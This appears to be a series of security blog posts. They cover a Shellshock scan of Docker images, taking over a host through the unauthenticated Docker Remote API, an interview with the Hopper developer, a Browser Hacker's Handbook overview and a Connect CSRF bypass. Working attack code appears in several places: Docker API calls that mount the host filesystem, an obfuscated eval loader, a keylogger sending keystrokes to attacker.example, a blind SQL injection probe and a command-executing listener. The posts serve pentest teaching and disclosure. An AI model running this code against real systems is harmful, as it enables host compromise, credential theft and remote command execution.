Shellshock: a survey of Docker images

When I look at the whole Shellshock debacle I am mostly sad. Sad that one can exploit a bug in a piece of software from 1989 to hack internet-connected devices in 2014. I always have this naive hope that maybe, just maybe, not everything is hopelessly broken - which of course gets crushed every other week.

Enough ranting. This blog post is about some small research I ran last week on Docker and Shellshock. No, sorry, this is not yet another "product X is vulnerable to Shellshock if used on a dark night with a super moon" report. So, what is this about? To understand that, we need to do some homework.

Docker Images and you

One of the core concepts of Docker is the difference between an Image and a Container. The TL;DR, slightly inaccurate version (I should not say Virtual Machine in this context, but all readers will be familiar with VMs) can be broken down into two points:
  1. An Image is a "base", read-only virtual machine template, and a Container is a writable instance of that machine;
  2. Images can be chained in a hierarchy of inheritance where a base image is modified, generating a child image, and so on. This is "the way" to build images, even though you can always build your own from scratch.
Here is an image deep linked from the Docker documentation, which should make things clearer.
As you can see, the Debian base image has a couple of children before finally generating a writable container. The logic of Docker is such that you should not be "changing" the base image but rather "building on top" of it, adding new components. You certainly can change it, but that would kill one of the key benefits of Docker - citing Red Hat, the "lightweight footprint and minimal overhead".

Another important piece of information is that Docker maintains its own repository of public images that anyone can download and use. Docker has some rather complicated concepts for indexes and registries, but they don't help us here: suffice it to say that in practice lots of users will download images from this "official" repository.

Some important implications for us security folks:

  • If a base image has a security bug, it is at least possible (if not likely) that all the children will inherit the same bug;
  • The logic with which developers most likely approach this model is "I won't have to worry about the base image". This has been somewhat hinted at, and while some experienced developers will take the need for updates into consideration, not everyone will;
  • People will download and build upon a set of images from Docker's repository. No, we will not hack that, stop being evil!

Yeah, OK. So, Shellshock and Docker?

Now that we have a shared, passable understanding of how Images work in Docker, let's get to what I have done. Last week I wondered how many of the most popular Docker base images had been updated: Shellshock had significant press coverage, the kind of coverage that pushes my mum to ask me about "that problem they are talking about in the news", so I figured that most of the main images would have been updated by now. Had they?

To find out, I whipped together a small Python script (published on GitHub) that downloads a list of Docker images in a host VM, downloads and runs a script on each one, and then reports the results. Once I finally managed to get it working reliably (and I suspect Guido might have heard me cursing my inability with the language he designed as I longed for the forbidden PHP fruit), I ran it against the 100 most popular Docker images published on Docker's repository. In a nutshell, my script simply downloads each image, runs bashcheck on it, and then reports back the results. Because of the way the integration is designed, it only works on Debian-based images: this is an important point because it means that all my results likely underestimate the actual numbers.
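The published script has more moving parts, but the core loop boils down to something like this sketch (TypeScript for Node; the image list, the bashcheck.sh path and the failure handling are illustrative assumptions, not the published code):

// Pull each image, run bashcheck inside a throwaway container, report the output.
import { execSync } from "child_process";

const images = ["ubuntu", "debian", "asher/remote_syslog"]; // in reality, the top 100

for (const image of images) {
  try {
    execSync(`docker pull ${image}`, { stdio: "ignore" });
    // Mount bashcheck read-only into the container and run it with the image's own bash.
    const out = execSync(
      `docker run --rm -v "$PWD/bashcheck.sh:/bashcheck.sh:ro" ${image} bash /bashcheck.sh`,
      { encoding: "utf8" }
    );
    console.log(`${image}: ${out.trim()}`);
  } catch {
    // a non-zero exit means the check failed or found something; flag for review
    console.log(`${image}: check failed, possibly vulnerable`);
  }
}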

Many VirtualBox crashes later, the results were back. 30 images had at least one instance of the many bugs the Shellshock umbrella covered. The full results are in the repository with the script, and I'll summarize them later on, but a caveat first. There is no proof that containers using these images or derivatives of these images can be exploited: the only thing my script detects is the lack of patching. Don't wear your tinfoil hats just yet.

Now, without further ado...

Things I have learnt scanning the 100 most popular Docker images

  • 30% of the top 100 images were still vulnerable to one of the Shellshock bugs;
  • 4 of the top 30 were vulnerable, 1 in the top 10 - so around 10% of the really popular images;
  • None of the vulnerable images were "official, Docker maintained images", but some were based on them: those images were still vulnerable because they had not been rebuilt after the patch was applied to the base images. That is, using a base image that gets regularly updated is not enough;
  • Some of the vulnerable images have a sizable user base, or at least download count. asher/remote_syslog has almost 900,000 downloads;
  • The Docker security team is really nice. I gave them a heads-up (nothing for them to do here really, in terms of incident response, but a lot of long-term work) and they were very direct about the issues and shared some nice insights. Thumbs up.
A summary of the Shellshock-related bugs found in my scan of October 9th, 2014

Things you should worry about

Pentesters never worry! If you are a pentester, you likely want to keep an eye out for usages of Docker images during a pentest. You might even want to ask for the containers' configurations to discover vulnerabilities before you even start the test - it's wonderful to have bugs on day 0.

If you are on the other side of the security fence, though, Docker is coming for you: it's the new hotness and it's quite likely to pop up in your infrastructure in one form or another. The sooner you have a strategy in mind to update those containers, the better.

But wait, didn't we use to have the very same problem with virtual machines a few years ago? We still do. But we used to, too.
However, I think there are some subtle but important differences here. As an admin or security person, you can't just SSH into the machine, "apt-get upgrade" it, and save a new snapshot. There is a whole chain of images that might get forked at various points, and some of the nodes might even escape your control. Updating images is a very real, known problem: the Docker security team told me they are looking into it, so hopefully things are going to get better in the future, but for now you really want to have a story for managing updates. Possibly before the next Shellshock.

My humble view on things that could be improved

I should start by saying that I don't know nearly enough about Docker's infrastructure to have a complete view - and that writing posts where you don't have to provide solutions to the problems you find is much easier. However, I think I realized two or three things while working on this:
  • Reporting bugs on Docker images is hard! Some of these images have tens of thousands of users but no bug tracker or no clear way to report security bugs. In some cases I've opened an issue on GitHub and hoped for the best. Some kind of built-in bug reporting feature would be a nice addition to the registry, or maybe this could be baked into Dockerfiles?
  • Old images are bad! When you look at an image in Docker's repository you have a clear indication of when it was built (or at least committed). Check out the properties of itzg/minecraft-server: it was built before the Shellshock bug was even discovered and it's based on an official base image. Now, given that we know which base images are vulnerable to which bugs and when, it should be possible to simply flag all the images built before that date as potentially vulnerable as well;
  • Custom images are a lot of work to maintain. On one of my bug reports the maintainer of the image just said "sure, I'll rebuild". Since he was using an official Debian build as a base image, it's not a lot of work on his side. Had he used a completely custom OS, he'd have had to do a standard upgrade, which takes more and more time and effort as the image ages.

In conclusion...

A somewhat interesting percentage of images was found to be vulnerable during my tests, for a total of maybe a couple of million downloads and thus potentially affected containers. The interesting takeaway for me, however, was that updating Docker images is subtly different from, and possibly more complex than, updating VMs. I suspect this is something we'll have to deal with more and more in the future as containerized systems become widespread.

EDIT: I have been pointed to this blog post, which does a detailed analysis of some of the official base images - I only pulled the latest tag for each image, so they get more coverage there. From a quick skim, none of the images I found to be vulnerable were based on the images they flag in the article.

Abusing Docker's Remote APIs

Foreword: is this post about a security vulnerability?

Ultimately it's not. This is a short note on how to exploit a somewhat under-documented feature of the Docker remote APIs, since I did not manage to find clear guidance elsewhere and had to experiment with it myself. The reason for sharing is to save you time during your next pentest. That said, do I think this is bad? Yes, I do, as I will explain later on.

EDIT: It turns out maybe I wasn't so wrong to worry about this - see this announcement.

So, what is this about?

TL;DR: Docker's Remote API trivially allows anyone with access to it to obtain access to the file system of the host, by design, and it is unauthenticated (but disabled) by default.

Docker is a container-based platform for application "shipment", but to be fair, the official what is Docker page does a better job at explaining what this is all about. Docker is all the rage these days and if you have never heard of it you should really look it up. It's quite likely to show up in one of your next penetration tests, since companies seem to be experimenting with it quite extensively.

Docker is usually managed via a command line tool, which connects to the Docker server via a Unix socket. Access is restricted to the root user by default or to an aptly named Docker group, at least on the Ubuntu packages I've experimented with. So far, so good (sort of, but I don't really have strong arguments here).

This is of course not very convenient if you are working in any environment but your bedroom, so the helpful devs have provided a RESTful API which can be bound to any HTTP port. It is not enabled by default, which is something worth stressing, but it can be turned on via a flag (-H tcp://IP_ADDRESS:PORT). IANA has assigned ports 2375 and 2376 to the cleartext and SSL-protected versions of the API respectively.

Looking at the API reference you'll see the APIs support all the operations you'd expect in a VM-management tool. By default there is no authentication, so all you need to do is find the target (which you can fingerprint by hitting the /version endpoint) - unless, of course, the admin has enabled some other kind of protection. The simplest way to do so is to use Docker's tlsverify feature, and everyone should do that. However, given that the process does not work on OS X, guess how many programmers' laptops you are going to pop?
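Fingerprinting really is a one-liner; a minimal sketch in TypeScript (host and port are illustrative, and this assumes the API is exposed in cleartext):

// The unauthenticated /version endpoint is a reliable fingerprint for an exposed daemon.
const res = await fetch("http://victim:2375/version");
console.log(await res.json()); // Version, ApiVersion, GitCommit, GoVersion, Os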

Accessing the host file system

The trick is ultimately quite simple: you just start a new container (think of it as a VM and you won't be far off) with a special configuration, then access it. First, create a container on the host (I'm trying to keep the call small here):

POST /containers/create?name=cont_name HTTP/1.1
Content-Type: application/json

    {
      "Cmd": ["/bin/bash"],
      "Image": "ubuntu"
    }

You'll get back an ID for your container. Now, start the container: note that in my experiments I was able to make these "Binds" work only once, the first time a container is started.

POST /containers/$ID/start HTTP/1.1
Content-Type: application/json

 {
  "Binds":["/:/tmp:rw"]
 }

Now you have a running container where the /tmp directory maps back to the / of the host. You still have to log into the container to go wild on the host, and since you don't have direct access to said poor host, you need SSHd running on your container. The default Ubuntu image won't have SSHd up, so you'll have to use a different image (consider baseimage-docker) or tweak around with the cmd - this very last part is left as an exercise for the reader... or scream at me enough in the comments and I'll come up with something. Alternatively, you might be able to use the copy endpoint (documentation of the copy endpoint) but I've not experimented with that.
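For reference, here is the same create/start sequence as a TypeScript sketch against an exposed daemon (the host and container name are illustrative; this mirrors the manual requests above and nothing more):

// Create a container that binds the host's / to /tmp (rw), then start it.
const HOST = "http://victim:2375";

const create = await fetch(`${HOST}/containers/create?name=evil`, {
  method: "POST",
  headers: { "Content-Type": "application/json" },
  body: JSON.stringify({ Cmd: ["/bin/bash"], Image: "ubuntu" }),
});
const { Id } = await create.json();

// As noted above, the Binds seemed to be honored only on the first start.
await fetch(`${HOST}/containers/${Id}/start`, {
  method: "POST",
  headers: { "Content-Type": "application/json" },
  body: JSON.stringify({ Binds: ["/:/tmp:rw"] }),
});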

Why this is worth writing about, or why I don't like un-authed admin interfaces

As I said at the beginning of the post, this writeup is mostly a time saver for those dealing with Docker during a penetration test. However, there is something that I don't like in the way Docker has gone about designing these APIs: the complete lack of any default auth.

There are of course various reasons why you would ship such a critical feature with no authentication to be seen: time to market, the fact that after all it is disabled by default, or more likely the will to attain segregation of duties. Designing a secure authentication system is complicated and error prone, and ultimately not the role of an API. Delegating it is a better idea than botching it, so that it is clear where things go wrong.

I beg to disagree, and I'd have expected better from a company that produced such a well-thought-out discussion of the security issues with running SSH on a container. I'm going to argue that there is a huge gap between having a clearly horrible authentication system and having nothing at all. The sad truth, as anyone who has done any pentesting in their career will tell you, is that the vast majority of end users will run with whatever was shipped out of the box. Security people cheered when Oracle started to require users to set passwords during installation instead of setting default ones (ok ok, that's a long story), and the experience of the Internet Census tells us how easy it is to forget to change that password, or to set up that auth.

Of course, security-minded admins will set things up correctly and invest all the time needed to configure a secure environment. But what about the others? Was it so difficult to require a Basic Auth-powered password at startup?

Friction (as in, anything that makes your product harder to use) is bad, but pwned users are worse.

Bonus: Here is a simple nmap probe for the Docker APIs.

##############################NEXT PROBE##############################
# Queries Docker APIs for the /version url containing version information.
#
Probe TCP docker q|GET /version HTTP/1.1\r\n\r\n|
rarity 7
ports 2375
sslports 2376

match docker m|.*{"ApiVersion":"(.*)","Arch".*"GitCommit":"(.*)","GoVersion".*"Os":"(.*)","Version":"(.*)"}.*| p/Docker remote API/ v/$1/ o/$3/ i/GitCommit:$2 DockerVersion:$4/

Five questions with: Vincent Bénony (Hopper Disassembler)

In recent years, we have seen an increase in micro software-houses building amazing security software and actively contributing to redefining how we do security. Personal projects quickly turn into powerful tools used by thousands of people to improve the security of many systems around the world. We live in exciting times, where a small team can build things that are going to shape the future of infosec. At NibbleSec, we support and celebrate those successes.

Today, we asked Vincent Bénony to talk about his experience with the Hopper Disassembler:

Q: Hi Vincent, would you mind telling us a little bit about yourself? How did you get into programming and security?

A: Hi! This is a long story... I started programming when I was very young, with the Oric Atmos (if any of you remember this computer). Back then, I was 7 and I’m not sure that I understood what I was doing. I continued on the Amiga, where I really discovered assembly language with the Motorola 68000. Those were, by the way, my very first steps in reverse engineering. Like many other guys at that time, I started looking at the anti-copy schemes of games. Each time, it was a really fun challenge. Then, I moved to the demo scene and continued coding small demos. Naturally, I chose to study computer science at university where, later on, I defended my PhD in the field of cryptography. That was the time when I got back to security and reverse engineering.

Q: When did you realize that Hopper was something more than a personal project? How did this happen?

A: I started working on Hopper as a hobby project, as I could not afford the price of an IDA license. At that time, I realized that I didn’t need such a powerful tool, and that only a few of IDA's features were really useful to me. Being an OS X user, I really don’t like the look-and-feel of most Qt applications, as they're just a raw transposition of their Windows versions; they feel like aliens in my OS, and most of the UX habits cannot be transposed to these UIs. Qt is a great toolkit - I love it, and I use it for the Linux version of Hopper - but I really think that each version has to be customized for the targeted OS… So, I decided to write a very little program to do interactive disassembly. And the project started to grow. It was developed at night, after my daily job, and when my children were sleeping :) And then, the Mac App Store was announced… It changed many things. A friend of mine - hello Sebastien B. :) - told me that I should try to see if there were people interested in such an application on the Mac App Store. I really doubted it at first, but I tried anyway… and then… a miracle. I rapidly encountered many people who were interested in the idea of a lightweight alternative to IDA for OS X. The project started to require a lot of time. I received a lot of very positive feedback from users, hence I had to make a choice between my job and Hopper… I decided that I had to take my chance. Today, I'm always amused when I look at the very first screenshots of Hopper. It helps me to measure the amount of work that has been done :)

Q: As a micro software company, what are the problems and opportunities?

A: The problems are multiple. First, the development of the software by itself represents only a small part of my day-to-day job. Commercializing software is not just producing code. I have to deal with many things like the website, user support, legal aspects (accounting, taxes…), and even things that may sound anecdotal but take me a lot of time, like drawing icons :) - btw, I’m clearly not a designer. That being said, this is only a matter of organization. And I’m always pleased to see that there is so much positive feedback! This is something that pushes me beyond my limits. I always try to communicate as much as I can about the software and its development. Many times, people are talking about the project on media like Twitter, which is a really great tool to help me reach potentially interested people. Security conferences are also something that I try to follow as much as I can. For instance, I try to go to every conference in France: I’m almost sure to meet people who use this kind of software, and their feedback is always of great value! Most of the features that were added to Hopper v3 are things that were discussed with people I met at conferences like NoSuchCon in Paris.

Q: Being a one-person software company, how do you track and prioritize new features and bugs? Which software development model are you following? In other words, how do you make sure that you're working on something relevant?

A: I’m an academic person, hence I was not really at ease with the software development methods used by real companies. I don’t know how it works outside France, but the studies I followed were purely about the theoretical aspects of computer science and nothing else. I have a coherent vision of what I would like to reach with Hopper. I always read all the messages that I receive from my customers, and I write down on my todo list all the ideas that are compatible with the initial vision I had for my software. I always try to avoid mutating Hopper into something that pretends to fit the needs of everyone; I want it to be lightweight and coherent. Once I have filtered the features that I want to implement, I usually start with the most visible part, implementing bogus functional parts. This is a good way to get rapid visual feedback. If the feature still makes sense according to my usual workflow, it is kept. I really need to see the progress on a feature, and starting with the visual parts helps me a lot! Another thing: I strongly believe that the only way to write something coherent is to be the first client of your software. I use Hopper a lot, for many things, even debugging Hopper itself :)

Q: What would you recommend to people starting or maintaining a security tool? Which business model would you recommend to turn a personal project into a sustainable source of income?

A: I'm not sure whether my very little experience in the field is really relevant. Evaluating simple things, like the product price, the targeted audience, and so on, is very difficult, but it's something that needs to be done. After that, I really love to simulate things: I wrote tons of Python scripts to simulate the viability of my company for the next 10 years (with a lot of pessimistic hypotheses, to avoid future problems). Whether Hopper will continue to be a stable project is too soon to say, but I did my best to avoid jumping into the wild with no clear view of what I want to achieve. Anyway, deciding to work full-time on Hopper was one of the best things that I've ever done: working on something stimulating is really awesome! Sometimes exhausting, but really awesome :)

An Overview of The Browser Hacker's Handbook

Writing a book is definitely a big and time-consuming task. After one year, Wade Alcorn, Cristian Frichot and I finally released the Browser Hacker's Handbook in March 2014. Looking back at our git repository (I know it's not ideal to track binary file changes, such as MS Word documents, with git..), I counted more than 2300 commits, starting on 5 December 2012 with drafting the ToC and finishing on 30 March 2014 with the creation of the https://browserhacker.com website.

Only after you write a book can you understand two things:
 - why your partner always deserves the first big THANKS
 - why you will not write another book for at least the next 5 years

Our adventure started when Wade and I were discussing creating a BeEF training to be presented at SyScan. Eventually we decided to switch to the book and maybe take care of the training later on (it's still on our overly long TODO list).

The Browser Hacker's Handbook (BHH) is the first book focused entirely on browser hacking from the attacker's perspective, something that had been missing so far (even PortSwigger mentions that in the Web Application Hacker's Handbook, 2nd edition). There are other books I personally recommend if you're interested in browser/web security, like The Tangled Web by Michał Zalewski and Web Application Obfuscation by Mario Heiderich (friend and BHH technical editor, kudos!) et al. Both of those books are great and technically deep, but neither of them focuses exclusively on the browser ecosystem and how it can be attacked, so there you go BHH :-)

Something worth noting is that this is not a book about BeEF, which is mentioned multiple times but is not the focus of the book. Most of the code (see http://browserhacker.com/code/code_index.html) is pure JavaScript/Ruby, which you can use with your own browser hacking framework or with tools other than BeEF. BeEF is mentioned throughout the book not only because Wade created it and I'm the lead core developer, but simply because there is no other open source tool at the moment that is as mature (yeah, we're still in alpha..) and has the number of modules currently in BeEF. Many people around the world use BeEF professionally for social engineering and red-team assessments with success, demonstrating that BeEF is mature enough to be used during your own pentests. Even Jester modified it, adding a bunch of 0days and other stuff, and was using it in the wild a while back: http://jesterscourt.cc/2012/07/04/project-looking-glass/

What we decided to do was to create the first browser hacking methodology, one that comes in handy during red-team and social engineering engagements. The methodology can be summarized with the diagram below:
As you can see, there is an entire chapter dedicated to each of these categories, and to be honest it wasn't that easy to place some of the attacks in one chapter rather than another. For instance, we discuss multiple RCEs in various web applications in Chapter 9 (and how you can exploit them cross-origin from the hooked browser), but also in Chapter 10 when discussing the BeEF Bind shellcode technique. SOHO router attacks and some social engineering attacks are other examples of attack categories that can overlap multiple chapters.

Initiating Control
The book starts by introducing control initiation techniques, a mandatory step if you want to have the target browser execute your malicious code. From the multiple types of XSS, including DOM-based and Universal-XSS, to social engineering attacks involving baiting and phishing (btw, you can do template-based mass-mailing and phishing all with BeEF), finishing with classic Man-in-the-Middle scenarios like ARP Spoofing, DNS Poisoning, Wi-Fi related things and so on. After experimenting with the source code and attacks discussed in this chapter, you should have a solid grasp of how to start your browser hacking journey.

Retaining Control
You initiated control with the browser executing some code, most likely JavaScript: now you need to retain that control for as long as possible. Some attacks might need only one or two seconds to complete, others might take several seconds or minutes depending on their configuration. Additionally, you want a bidirectional communication channel, so that the hooked browser can exfiltrate data to your server and the server can push new code to be executed by the browser. Communication techniques such as XMLHttpRequest polling, WebSockets and DNS Tunneling (yes, bidirectional and purely in the browser without using plugins) are discussed, as well as some persistence techniques like overlay IFrames, pop-unders, browser events and more advanced Man-in-the-Browser attacks. The chapter finishes by presenting examples of evading detection and playing with obfuscation, which can generally be reduced to the decode-then-execute pattern sketched below:
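A toy illustration in TypeScript (the chunking and base64 encoding are just examples of the general idea, not code from the book):

// Store the payload in a form signature-based filters won't match,
// then rebuild and evaluate it at runtime.
const chunks = ["Y29uc29sZS5sb2co", "Imhvb2tlZCIp"];
const payload = atob(chunks.join("")); // decodes to: console.log("hooked")
new Function(payload)(); // indirect eval, avoiding a literal eval() call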

Bypassing the SOP
The Same Origin Policy is probably the most important, inconsistently implemented, broken and bypassed security control in today's browsers. The chapter goes through many different SOP implementations in Java, Adobe Reader/Flash, Silverlight and multiple browsers, presenting some well-known and less-known quirks, bugs and bypasses (some of them unpatched, or broken by design). This chapter also analyzes UI redressing attacks such as Clickjacking, Cursorjacking, Filejacking and drag&drop tricks, and provides some real-world examples of how to steal browser history. Bypassing the SOP is an optional step, as are the next attacking phases. While you need to initiate and retain control, you might not need to bypass the SOP or attack web applications if your goal is to trick the user into installing a backdoored Chrome extension, for instance. Going through the book, especially Chapters 9 and 10, you will discover the multitude of attacks you can still deliver against web applications and networks without the need for a SOP bypass.

Attacking Users
Humans are often referred to as the weakest link in information security. Is it our inherent desire to be ‘helpful’? Perhaps it’s our inexperience. Or, is it simply our (often) misplaced trust in each other? Either way, social engineering users is always fun. The less they know about computers in general, the better, as they tend to click OK or ALLOW on any kind of real or spoofed user prompt you can create. This chapter introduces how to capture multiple types of user input via hooking JavaScript events. 

For instance, a nice and easy attack, in case the browser was hooked via a post-auth XSS, is to create an overlay IFrame that loads a same-origin resource: the login page of the hooked origin. This IFrame also has a JavaScript keylogger attached to it: the user thinks his session just expired, so he enters his credentials, which are captured and sent back to us. At the same time this attack achieves some form of persistence, as the communication channel keeps running in the background while the user browses in the foreground overlay IFrame. Many other social engineering attacks are discussed, such as Signed Java Applets, Fake Software Updates, Malicious Extensions, HTAs and other tricks on Internet Explorer.
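A minimal sketch of that overlay trick in TypeScript (the collection URL is made up, and a real implementation would also mimic session-expiry styling and forward the login):

// Overlay a same-origin login page and log keystrokes typed into it.
const frame = document.createElement("iframe");
frame.src = "/login"; // login page of the hooked origin (same-origin)
frame.style.cssText =
  "position:fixed;top:0;left:0;width:100%;height:100%;border:0;z-index:999999";
document.body.appendChild(frame);

frame.addEventListener("load", () => {
  // Same origin, so we can reach into the frame's document.
  frame.contentDocument?.addEventListener("keydown", (e) => {
    void fetch("https://attacker.example/k", {
      method: "POST",
      mode: "no-cors", // fire-and-forget
      body: e.key,
    });
  });
});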

Attacking Browsers
This chapter deals with attacking the browser itself. Before attacking it, you want to fingerprint exactly which browser type and version is hooked. Fingerprinting through HTTP headers, DOM properties, software bugs and other quirks is discussed. By combining these fingerprinting techniques, you can be almost sure of an accurate result even if someone is spoofing their browser type/version. Cookies, protocol handlers (aka schemes) and the SSL/TLS layer are also discussed, with some examples of attacks and bypasses. The chapter ends with some analysis of heap exploitation in Firefox and other examples of how you can get shells if you find a bug in the browser's JavaScript interpreter or HTML parser.
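As a taste of the DOM-property approach, here is a toy fingerprinting function in TypeScript (the checks are illustrative and era-specific, not the book's list):

// The UA string is trivially spoofed; engine-specific DOM objects are not.
function guessEngine(): string {
  const w = window as any;
  if (typeof (document as any).documentMode !== "undefined") return "Internet Explorer";
  if (typeof w.InstallTrigger !== "undefined") return "Firefox";
  if (typeof w.chrome !== "undefined") return "Chrome/Chromium";
  if (typeof w.safari !== "undefined") return "Safari";
  return "unknown";
}
console.log(`UA claims: ${navigator.userAgent} / DOM says: ${guessEngine()}`);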

Attacking Extensions
Browser extensions run in a privileged context, with higher privileges than, for instance, the normal context where JavaScript is executed when you browse to https://browserhacker.com. For this reason, if the extension is buggy, or if you can trick the user into installing your malicious extension, it's usually game over. Firefox and Chrome extensions are discussed, including fingerprinting, spoofing, cross-context scripting and various RCEs. Remember that at the time of writing the book and this blog post, Firefox extensions do not run in a sandbox, so an XSS in an extension leads to RCE. Chrome extensions (especially with manifest version 2, which is the default right now) are less vulnerable, especially thanks to the adoption of the Content Security Policy, but the malicious/backdoored extension social engineering trick is still a viable option. Luca and I discussed this a while ago in this post: http://blog.nibblesec.org/2013/03/subverting-cloud-based-infrastructure.html

Attacking Plugins
In the years (well, months) before Click-to-Play was implemented in the Java plugin and in Chrome/Firefox, 0days in Java, Adobe Reader/Flash, RealPlayer, VLC and others were the preferred and easiest way to create botnets. The exploitation of those bugs in the wild was pretty crazy. So far, Internet Explorer and Safari are the only major browsers that still do not implement Click-to-Play, so plugin attacks are still quite possible with those browsers, but not really an option on Chrome/Firefox (unless you have a Click-to-Play bypass in your 0day collection). Multiple bypasses are discussed in the chapter, as well as other tricks you can use with VLC, ActiveX and Java.

Attacking Web Applications
The main concept behind BHH is abusing the existing functionality of the browser ecosystem to subvert the system. This includes launching traditional web application attacks from the hooked browser, which effectively becomes a beachhead and a pivot point into the internal network. Something (probably not that well known) is that even without a SOP bypass you can still send cross-origin requests that do not generate a preflight request. This obviously happens with GET and HEAD, but also with POST with certain content types such as text/plain, application/x-www-form-urlencoded and multipart/form-data. Such behavior is enough to carry out attacks where (see the sketch after this list):
 - you need to "blindly" send the request: for example, you can exploit any XSRF, RCEs, DoS and so on cross-origin;
 - you need to infer from request/response timings: for example, you can exploit cross-origin any kind of SQL injection using time-based blind attack vectors.
You can even detect and blindly exploit XSS cross-origin, damn! You can actually do so many things without a SOP bypass, working fully cross-origin, that you have to read the chapter to get a good grasp. You can even create a full HTTP/HTTPS proxy with just an XSS.
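A minimal sketch of such a "simple" cross-origin request in TypeScript (the target URL and the injected parameter are illustrative; the response stays opaque without CORS headers, but the timing is still observable):

// No preflight: a POST with a form content type is a "simple" request.
const t0 = performance.now();
await fetch("http://intranet-target/search", {
  method: "POST",
  mode: "no-cors",
  headers: { "Content-Type": "application/x-www-form-urlencoded" },
  body: "q=1' AND SLEEP(5)-- -", // time-based blind SQLi probe, for example
});
console.log(`round trip: ${performance.now() - t0} ms`);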

Attacking Networks
The last chapter of the book focuses on attacking networks (mostly internal networks, but not limited to them), starting with various techniques to retrieve the internal IP address of the hooked browser, and moving on to ping sweeping, port scanning and fingerprinting. The main part of the chapter is devoted to IPC/IPE, Inter-protocol Communication and Exploitation. Basically, you can communicate via HTTP with non-HTTP protocols like IRC, SIP, IMAP and most ASCII protocols if two conditions are met:
 - the protocol implementation is tolerant to errors, meaning that it doesn't close the socket if you send garbage data;
 - the target protocol data can be encapsulated into HTTP requests.
Generally speaking, when IPC works, you communicate with the target protocol by sending a POST request whose body contains the protocol commands, as sketched below. The HTTP request headers are discarded as invalid commands, but the POST body is actually executed.
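Here is a toy TypeScript example of the idea (host, port and channel are illustrative; note that browsers block the default IRC ports, so a daemon listening on a non-default port is assumed):

// Speak IRC over an HTTP POST: the request line and headers are rejected
// as invalid IRC commands, but each line of the body gets parsed.
await fetch("http://192.168.1.20:8067/", {
  method: "POST",
  mode: "no-cors",
  headers: { "Content-Type": "text/plain" }, // "simple" request: no preflight
  body: ["NICK hooked", "USER h 8 * :h", "JOIN #loot", ""].join("\r\n"),
});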

In the book we exploit this behavior in order to send shellcode, specifically the BeEF Bind shellcode originally written by Ty Miller for Windows and ported to Linux by Bart Leppens. BeEF Bind is a staging bind shellcode that acts like a minimal web server, returning the Access-Control-Allow-Origin: * HTTP response header and piping OS commands. In this way the browser can communicate via HTTP with the compromised box over a stealthier communication channel, as you can see in the diagram below.
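To make the mechanics concrete, here is a toy emulation of what the stager looks like from the browser's side, in TypeScript for Node (purely illustrative; the real thing is shellcode, not JavaScript, and the cmd parameter name is an assumption):

// Minimal "BeEF Bind"-style listener: permissive CORS header plus command output.
import { createServer } from "http";
import { execSync } from "child_process";

createServer((req, res) => {
  let body = "";
  req.on("data", (chunk) => (body += chunk));
  req.on("end", () => {
    const cmd = new URLSearchParams(body).get("cmd") ?? "id";
    // The ACAO header is what lets the hooked browser read the response.
    res.writeHead(200, { "Access-Control-Allow-Origin": "*" });
    res.end(execSync(cmd, { encoding: "utf8" }));
  });
}).listen(4444);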

So, this is the Browser Hacker's Handbook! Read it and experiment with the code at https://browserhacker.com if you're interested in hacking browsers, web application security, or if you need to secure your (web-)infrastructure. Your browsers and intranets have never been more exposed! :-)

Cheers
antisnatchor

Node.js Connect CSRF bypass abusing methodOverride middleware

In the previous post, I discussed the importance of well-written documentation and uncomplicated APIs, suggesting that poor documentation and negligence should be considered silent threats.

Almost a year ago, I reported the following issue to the Node.js Connect maintainers. To me, this is a perfect example of the risks of incomplete API documentation that doesn't clearly warn the user of potential side-effects. Please note that in recent releases of Express, connect-csrf is now called csurf and methodOverride is now method-override. Different names, same API.

Disclosure timeline

This issue was reported to Senchalabs on 07/25/2013. Despite my requests to add a warning to the online documentation, there's still no indication of the potential side-effects in Connect's methodOverride documentation. On 09/07/2013, this advisory was also published by the NodeSecurity community. Unfortunately, I don't think the issue raised an adequate level of attention, as suggested by the many vulnerable applications that I've encountered.

Technical details

Connect’s methodOverride middleware allows an HTTP request to override the HTTP verb with the value of the _method POST parameter or of the X-HTTP-Method-Override header. As the declaration order of middleware determines the execution stack in Connect, it is possible to abuse this functionality to bypass Connect’s standard anti-CSRF protection.

Consider the following code:

...
app.use(express.csrf());
...
app.use(express.methodOverride());

Connect’s CSRF middleware does not check CSRF tokens in the case of idempotent verbs (GET/HEAD/OPTIONS, see csurf/index.js). As a result, it is possible to bypass the security control by sending a GET request with a POST method-override header or parameter:

GET / HTTP/1.1
[..]

_method=POST

The workaround is clearly to disable methodOverride or to make sure that it is declared before any security middleware, so that the override has already been applied when those checks run.
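For instance, a sketch of the safer ordering with the renamed packages (csurf / method-override; the cookie-based token storage and the header name are illustrative choices, not the only options):

import express from "express";
import cookieParser from "cookie-parser";
import csurf from "csurf";
import methodOverride from "method-override";

const app = express();
app.use(express.urlencoded({ extended: false }));
app.use(cookieParser());
app.use(methodOverride("X-HTTP-Method-Override")); // resolve the real verb first...
app.use(csurf({ cookie: true })); // ...so the CSRF check sees the effective method

Note that method-override version 2+ also only honors the override on POST requests, which addresses this bypass by itself (see the update below).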

Adam Baldwin made an eslint plugin that you can use to identify this issue.

Update 06/04: Douglas W. pointed out that it's probably a good idea to move to method-override version 2+ (https://www.npmjs.org/package/method-override#readme). The documentation has been updated with a reference to this issue.

On web frameworks, built-in security mechanisms and common pitfalls

Modern web application frameworks are expected to provide built-in security mechanisms against common flaws, such as Cross-Site Request Forgery and injection attacks. Developers can benefit from these protections as they don't need to create ad-hoc defense mechanisms and they can rather focus on building features.

Citing the OWASP Framework Security Project:
"The most effective way to bring security capabilities to developers is to have them built into the framework."

Although built-in security features have clearly improved web security, using a framework doesn't necessarily guarantee a bullet-proof application. When theory and practice diverge, things can still go wrong:
  1. Frameworks are not immune to bugs. They are software. As such, they can be affected by security issues too. Security mechanisms can be bypassed or abused. 
  2. Poor or inconsistent documentation. Using the appropriate APIs and invoking them in the right way is crucial to leveraging all the security mechanisms. Unfortunately, the quality of the documentation doesn't always facilitate the job of developers.
  3. Negligence. Developers still need to read (and understand) the documentation. Building secure software is complicated and requires in-depth understanding of all subtle details.
Although dealing with security issues in production environments is always painful, fixing application framework bugs is even more complicated. As framework bugs usually impact a high number of websites, weaponized exploits are often available within a few hours of disclosure. On the other hand, not all vendors are sufficiently agile to provide a patch. Moreover, remediation with homegrown fixes may not be trivial. Finally, developers and QA engineers do not necessarily have visibility into the actual code changes, so they're forced to perform full regression testing to make sure that the application still works as expected.

Despite that, security bugs are generally the most evident problem. High-impact security flaws in common frameworks generate Hacker News threads, flames in security mailing lists, and even mainstream attention. Good developers and blue teams follow security mailing lists, vulnerability feeds and vendor announcements. The probability of stumbling onto an advisory is close to one.

